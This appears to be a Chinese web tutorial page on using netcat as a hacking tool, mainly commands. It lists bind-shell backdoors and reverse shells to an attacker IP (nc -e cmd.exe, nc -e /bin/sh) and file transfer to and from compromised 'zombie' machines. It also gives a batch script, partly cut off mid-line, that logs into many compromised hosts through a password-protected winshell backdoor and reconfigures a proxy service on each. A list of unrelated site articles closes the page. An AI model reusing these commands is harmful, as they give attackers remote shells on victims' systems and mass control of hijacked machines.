网络军刀：NetCat的使用秘籍－黑客软件(3)

3 后门

victim machine: //受害者的机器

nc -l -p port -e cmd.exe //win2000

nc -l -p port -e /bin/sh //unix,linux

attacker machine: //攻击者的机器.

nc ip -p port //连接victim_IP,然后得到一个shell。

4 反向连接

attacker machine: //一般是sql2.exe,远程溢出,webdavx3.exe攻击.

//或者wollf的反向连接.

nc -vv -l -p port

victim machine:

nc -e cmd.exe attacker ip -p port

nc -e /bin/sh attacker ip -p port

或者：

attacker machine:

nc -vv -l -p port1 /*用于输入*/

nc -vv -l -p prot2 /*用于显示*/

victim machine:

nc attacker_ip port1 cmd.exe nc attacker_ip port2

nc attacker_ip port1 /bin/sh nc attacker_ip port2

139要加参数-s（nc.exe -L -p 139 -d -e cmd.exe -s 对方机器IP）

这样就可以保证nc.exe优先于NETBIOS(windows环境)

5 传送文件

attacker machine

nc -d -l -p port

nc -vv attacker_ip port pathfile.txt /*victim machine*/ 需要Ctrl+C退出

//肉鸡需要gui界面的cmd.exe里面执行(终端登陆,不如安装FTP方便).否则没有办法输入Crl+C.

attacker machine -- victim machine //上传命令文件到肉鸡

nc －vv -l -p port pathfile.txt /*victim machine*/ 需要Ctrl+C退出

nc -d victim_ip port

//这样比较好.我们登陆终端.入侵其他的肉鸡.可以选择shell模式登陆.

结论: 可以传输ascii,bin文件.可以传输程序文件.

问题:连接某个ip后,传送完成后,需要发送Ctrl+C退出nc.exe .

或者只有再次连接使用pskill.exe 杀掉进程.但是是否释放传输文件打开的句柄了?

端口数据抓包.

nc -vv -w 2 -o test.txt www.xfocus.net 80 21-15

telnet,自动批处理

nc victim_ip port

nc -vv victim_ip port

nc -d victim_ip port

_______________file.cmd________________________

password

cd %windir%

echo []=[%windir%]

c:

cd

md test

cd /d %windir%system32

net stop sksockserver

snake.exe -config port 11111

net start sksockserver

exit

6 抓取肉鸡

比如要统一更改肉鸡上面的代理端口.snake.exe 修改为11111 服务名称"sksockserver"使用winshell后门. 端口1234 密码password命令格式就是：

modi.bat youip.txt

___________modi.bat____________________________

@if "%1"=="" echo Error: no ip.txt &&goto END

:start

@echo password a.cmd

@echo s a.cmd

@echo cd /d %%windir%%system32 a.cmd

@net stop "sksockserver" a.cmd

@snake.exe -config port 11111 a.cmd

@net start "sksockserver" a.cmd

@exit a.cmd

:auto

@for /f "eol=; tokens=1,2" %%i in (%1) do @(nc.exe -vv -w 3 %%i 1234 【技巧总结】在windows中使用的用户，我们可以在环境变量中加入NC的path变量，如同java一样，这样我们运行起来就方便多了。NetCat用-s ip-addr或-s name来绑定本地网络资源地址，-p portarg来绑定本地端口，当然，使用arp –s可以实现IP的绑定。中安致远 IT教育培训机构 www.sans.org.cn

• ·简单修复 让泛黄破损老照片焕然一新－照片图片
• ·警惕恶意推广程序捆绑于音频播放器－安全资讯
• ·清除病毒后操作系统桌面消失的处理－系统技巧
• ·教你学会远程管理自己的主机－黑客软件
• ·多彩繁体QQ个性签名一个人孤军奋斗－QQ聊天
• ·优化802.11n实现无线网的语音传输－应用技
• ·皮线尾纤在FTTH组网中的应用－应用技巧
• ·下一代IDC向双线机房转型的四大方式－服务器
• ·浅谈电子配线架智能布线管理系统－组网技术
• ·SEO:网站内部链接和外部链接策略－设计理念